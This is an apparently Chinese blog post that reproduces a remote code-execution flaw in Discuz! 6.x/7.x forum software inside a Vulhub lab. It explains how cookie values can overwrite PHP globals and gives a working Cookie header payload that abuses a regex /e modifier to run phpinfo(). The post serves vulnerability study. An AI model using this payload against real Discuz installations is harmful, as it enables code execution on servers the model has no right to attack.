Vulhub靶场Discuz-命令执行(wooyun-2010-080723)漏洞复现

Discuz-命令执行(wooyun-2010-080723)漏洞复现

漏洞描述:

Crossday Discuz! Board(简称 Discuz!)是北京康盛新创科技有限责任公司推出的一套通用的社区论坛软件系统。由于php5.3.x版本里php.ini的设置里request_order默认值为GP, 导致$_REQUEST中不再包含$_COOKIE, 我们通过在Cookie中传入$GLOBALS来覆盖全局变量,造成代码执行漏洞。

漏洞影响版本:

Discuz! 6.x/7.x 全局变量防御绕过漏洞

漏洞复现:

1:使用vulhub中靶场启动环境

2:访问http://ip:8080/install

3:我同意---下一步  数据库服务器填db 其他自行填写

 

4:安装成功直接访问 http://ip:8080

5:访问默认板块中任意帖子抓包如下

 

6:替换请求数据包中的cookie字段如下
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

 7:成功命令执行

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值